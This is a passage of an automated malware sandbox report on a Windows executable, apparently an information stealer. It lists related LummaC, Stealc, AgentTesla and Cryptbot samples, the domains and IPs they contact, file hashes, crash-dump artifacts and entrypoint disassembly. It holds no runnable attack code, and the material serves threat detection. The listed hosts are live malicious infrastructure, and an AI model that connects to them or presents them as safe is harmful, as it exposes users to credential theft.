                                                                                                                                                                  New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                  Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  • artemis-rat.comartemis-rat.com:443
                                                                                                                                                                  3.5.25.82Hilcorp.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                    185.166.143.50Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        V7giEUv6Ee.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                          GdGXG0bnxH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                            fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                              pPLwX9wSrD.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                ozfqy8Ms6t.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  3XSXmrEOw7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    pPLwX9wSrD.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      https://feji.us/m266heGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        cuddlyready.xyzBJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                        QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                        FjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                        0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 193.143.1.9
                                                                                                                                                                                        s3-w.us-east-1.amazonaws.comBJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 3.5.29.90
                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                        mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.136.89
                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 16.182.101.249
                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.67.100
                                                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.18.140
                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.203.57
                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 3.5.16.86
                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                        • 16.182.37.145
                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.216.41.233
                                                                                                                                                                                        bitbucket.orgBJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                        EI3TafelpV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        CLOUDFLARENETUSarmv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 1.8.230.191
                                                                                                                                                                                        BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        Ref#20203216.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                        LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                        BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                        FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 104.21.32.96
                                                                                                                                                                                        mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                        Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                        nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                        AMAZON-02USarmv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 108.159.159.70
                                                                                                                                                                                        BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.48
                                                                                                                                                                                        jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.216.152.124
                                                                                                                                                                                        mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.67.100
                                                                                                                                                                                        Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.18.140
                                                                                                                                                                                        armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 54.203.164.5
                                                                                                                                                                                        5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 52.217.203.57
                                                                                                                                                                                        TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 185.166.143.49
                                                                                                                                                                                        AMAZON-AESUSdWGmbwk5xy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 3.5.29.90
                                                                                                                                                                                        qlo1CDVCSf.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        6dPpCeWDig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        kFrGefsAK3.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        NT3kfq4eeE.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        DP3m5O6yk5.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        uuOuIXWp1W.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        4JpRlHS5uF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        ME3htMIepa.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                                                                                                        • 34.226.108.155
                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        2ZsJ2iP8Q2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        LopCYSStr3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        LNn56KMkEE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        VBHyEN96Pw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        FBVmDbz2nb.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        • 172.67.150.173
                                                                                                                                                                                        • 3.5.25.82
                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                        No context
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                        Entropy (8bit):1.046094359747674
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:+tFo+nUMgn7XasDohroI7JfGQXIDcQvc6QcEVcw3cE/9rKr++HbHg/8BRTf3Oy14:KC+8aT0BU/YjudxhYfzuiFGZ24IO8a
                                                                                                                                                                                        MD5:22E8D0B20ECAF7A2B11F4ADD6F3A0681
                                                                                                                                                                                        SHA1:9CB05149A3AA6B5FD696DC80831A9D8C9242493D
                                                                                                                                                                                        SHA-256:D90254519107BC4630CC7528826AA0D741A40EFE626137304C2A36B2F70227CB
                                                                                                                                                                                        SHA-512:78B7B353E13CFBC14F4EC18C9FDA2B53C26A811A5D0E065DCDF690232F8F656D2D89D437E4006E49F5935A6ECAC2436936DFBACB13599CB2C533E8E794BBE306
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.2.2.3.5.5.3.7.9.5.4.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.2.2.3.5.5.9.1.0.7.9.9.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.b.1.9.b.8.3.-.0.0.c.7.-.4.a.3.9.-.a.c.6.b.-.2.9.6.6.f.c.7.c.9.6.1.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.9.9.9.1.c.c.-.1.b.1.9.-.4.c.9.c.-.b.0.b.8.-.1.2.d.d.d.5.2.4.a.6.d.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.F.B.m.z.8.5.H.S.0.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.9.0.-.0.0.0.1.-.0.0.1.4.-.f.3.1.9.-.6.5.e.f.1.3.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.0.2.1.f.e.1.a.6.2.4.8.8.2.e.0.6.f.4.8.7.9.9.e.9.4.7.4.f.8.2.6.0.0.0.0.f.f.f.f.!.0.0.0.0.5.6.c.a.4.4.a.b.9.c.c.2.6.8.6.4.b.f.8.6.a.4.1.f.8.2.4.3.1.2.3.9.b.a.f.9.9.4.a.8.!.F.B.m.z.8.5.H.S.0.d...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 10:12:35 2024, 0x1205a4 type
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):288642
                                                                                                                                                                                        Entropy (8bit):1.482534872811401
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:A1zaxJ6+2ukUQizqUWQGg5yKqovSpqDL:emxJ6+fkU/zqUWrsyKqovSpq
                                                                                                                                                                                        MD5:1B61356973375AF9081C3960D9813CD4
                                                                                                                                                                                        SHA1:DA9296C1267FA57C6608DE5636959543874ACD93
                                                                                                                                                                                        SHA-256:F4ECF94C4C8508B2A313B7AF0E8A5D549F34EB0DCA01BB1497277CB69F85CCF8
                                                                                                                                                                                        SHA-512:104D10CA10E4FE23F8CBAA528AA9736AF37EAFF9795A28245A16BB1D231DDA532CEDDEC64EDBCD2F1A8E9DAC1CC89614B9FF8DF3451FEAA422C013392FB8676C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:MDMP..a..... ........7ig....................................D....'..........L...........`.......8...........T...........xL...............(...........*..............................................................................eJ......`+......GenuineIntel............T.............ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):8390
                                                                                                                                                                                        Entropy (8bit):3.7047405369732296
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:R6l7wVeJ/r676YN+SU90cgmfJMprD89bQWsfbaQm:R6lXJj676YESU90cgmfJVQ1fbM
                                                                                                                                                                                        MD5:A39FB5D30BAE5D543C5B227A6FFECCB9
                                                                                                                                                                                        SHA1:B0326C9BA385D1918D0A65682A982A04E54F99EC
                                                                                                                                                                                        SHA-256:641EBBE558333DA8D4C1B5371BEFDDE280BE95C765A671157E388912EC3797F4
                                                                                                                                                                                        SHA-512:389A4581882160AAEA1333096710FEED50E4CB423F2BAB185E3824E546AED4B1D05EFD3D6E7053146E56E877549B20F40F477E6F7B36FBAF8853D94ACB86E250
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.1.2.<./.P.i.
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):4624
                                                                                                                                                                                        Entropy (8bit):4.503258357857739
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:cvIwWl8zsnUJg77aI930WpW8VY0Ym8M4JlKxFG+q8f6M5q2TzHXTd:uIjfnSI71t7VUJ7k42TzHXTd
                                                                                                                                                                                        MD5:6AE83BFFE6A48983AAEC7D032C328B9F
                                                                                                                                                                                        SHA1:BF2B413AC599747A90557155AC76B5CC098074CB
                                                                                                                                                                                        SHA-256:772BED64509D763C28C242029CF97CBCA8E53DD142BD650159106C2887BB4EC3
                                                                                                                                                                                        SHA-512:C5DCEAD0867C141F72D33853150536049E75E625C9020D5EB20B032667CAB0DF56EB17333CB7EDAFD9BC31CD217EBF764DFEB89CABD5523E0CA428D1B72E5AC2
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643755" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                                        Entropy (8bit):4.416669207630832
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6144:4cifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNl5+:ti58oSWIZBk2MM6AFBzo
                                                                                                                                                                                        MD5:0012748537F55D9387F5478EF49C2C94
                                                                                                                                                                                        SHA1:1EBCF74B5F62FDBE7E1504EA04133CD687094BDB
                                                                                                                                                                                        SHA-256:F856BDDCABA4440095B5BE80D1FD7F5C3B66A6F598B2F356496BFF9D92E5619D
                                                                                                                                                                                        SHA-512:C22AE4F8581E3D13BC03A3D9914B84E08E99493739CF7CBA6DED17B40E0126161A9721C4DC132309EF0980D4DE16BBE5E544DFC9AB7B48E4E6BBDF38B1392EEF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.../#U..............................................................................................................................................................................................................................................................................................................................................c...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Entropy (8bit):6.503291995330268
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                        File name:FBmz85HS0d.exe
                                                                                                                                                                                        File size:2'931'712 bytes
                                                                                                                                                                                        MD5:30669d81a7fc7b2867ecc452ce55d1d9
                                                                                                                                                                                        SHA1:56ca44ab9cc26864bf86a41f82431239baf994a8
                                                                                                                                                                                        SHA256:dad97310b0e1e3b946976f14c39d47bbb7140c31e79597abcd6159c2a4f02c32
                                                                                                                                                                                        SHA512:e2de976235fff3e36dc38a0cebc1fff403396132b35340cb2038f5b8c986e82ec39bef2c86c8d873e9a33eff03b541e518b0d5f62e180340f1b68e46ef5032fb
                                                                                                                                                                                        SSDEEP:24576:iZlWgiFXiAouvRDc6uhm7MQrSclGA7i7mDsY3Cr2jyZbPKokVLCjD1vItJyrF4mZ:iupRvhckMSWr2jy4TVmD20hAY9IUfU
                                                                                                                                                                                        TLSH:28D528A2F505B2CFD4CE5778902FCE82795D07B54B2248D7AA7C74BAADA3CC011B5C68
                                                                                                                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................../...........@.........................../.....3~-...@.................................T0..h..
                                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                                        Entrypoint:0x6f9000
                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                        Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                        Instruction
                                                                                                                                                                                        jmp 00007F4EF08FE1AAh
                                                                                                                                                                                        setp byte ptr [eax+eax]
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        jmp 00007F4EF09001A5h
                                                                                                                                                                                        add byte ptr [ebx], al
                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax+00000000h], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [edx], ah
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                        add byte ptr [edi], al
                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                        add byte ptr [eax], al
